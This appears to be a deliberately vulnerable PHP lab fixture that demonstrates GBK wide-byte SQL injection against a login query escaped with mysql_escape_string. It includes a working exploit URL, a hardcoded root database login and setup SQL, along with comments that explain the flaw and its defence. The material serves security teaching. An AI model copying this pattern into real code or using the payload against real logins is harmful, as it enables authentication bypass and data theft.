<?php
/*
 * code:c4bbage
 * From:cunlide测试数据
 */
// Lab fixture: a deliberately injectable login lookup that shows why byte-wise
// escaping fails on a GBK connection. It belongs on an isolated test host only:
// it connects as root, prints the raw SQL, and echoes request data back
// without HTML encoding.
error_reporting(E_ALL);

// The ext/mysql API used throughout this script was removed in PHP 7.0.
$link = mysql_connect("localhost", "root", "toor");

// Root cause, part 1: the connection character set is switched with a plain
// query. The server now decodes statements as GBK, but the client-side
// escaping routines used below are never told about it.
mysql_query("SET NAMES 'GBK'");
mysql_select_db("test1", $link);

// Root cause, part 2: mysql_escape_string() takes no connection argument and
// ignores the connection charset, so all it does is put a backslash (0x5C) in
// front of the quote byte. 0x5C is a legal GBK trail byte: when the byte in
// front of it is a GBK lead byte (the 0xBF in the sample request kept in the
// comment at the end of this file), the server reads lead byte + backslash as
// one character and the quote that follows is no longer escaped.
// The author's disabled alternative, addslashes($_GET['username']), is
// byte-wise too and fails in the same way.
$username = mysql_escape_string($_GET['username']);
var_dump($username);
$password = mysql_escape_string($_GET['password']);

// Defence: bind both values through a prepared statement (mysqli or PDO, with
// emulated prepares off) and declare the charset on the connection itself
// (mysqli_set_charset() or charset= in the PDO DSN) instead of SET NAMES.
// In utf8mb4 no multi-byte sequence contains 0x5C, which removes this class
// of bypass. Comparing the password inside the query also implies it is
// stored in clear text; verify a password_hash() value in PHP instead.
$query = "select * from admin where username='$username' and password='$password'";
print_r($query);
echo "<br>";

$resultSet = mysql_query($query, $link);
print_r($resultSet);
echo "<br>";

for (;;) {
    $record = mysql_fetch_array($resultSet, MYSQL_ASSOC);
    if (!$record) {
        break;
    }
    // The self-append is carried over unchanged from the original listing;
    // print_r() receives the value of the assignment expression.
    print_r($record[] = $record);
}
/*
exp:
http://127.0.0.1/sqli.php?username=%bf'union select 1,2,3%23&password=password
db file :
--test1.sql
SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";
--gbk database
CREATE DATABASE `test1` DEFAULT CHARACTER SET gbk COLLATE gbk_chinese_ci;
USE `test1`;

CREATE TABLE IF NOT EXISTS `admin` (
`id` int(11) NOT NULL,
`username` varchar(15) NOT NULL,
`password` varchar(15) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=gbk;

INSERT INTO `admin` (`id`, `username`, `password`) VALUES
(1, 'admin', 'password');

*/
44 ?>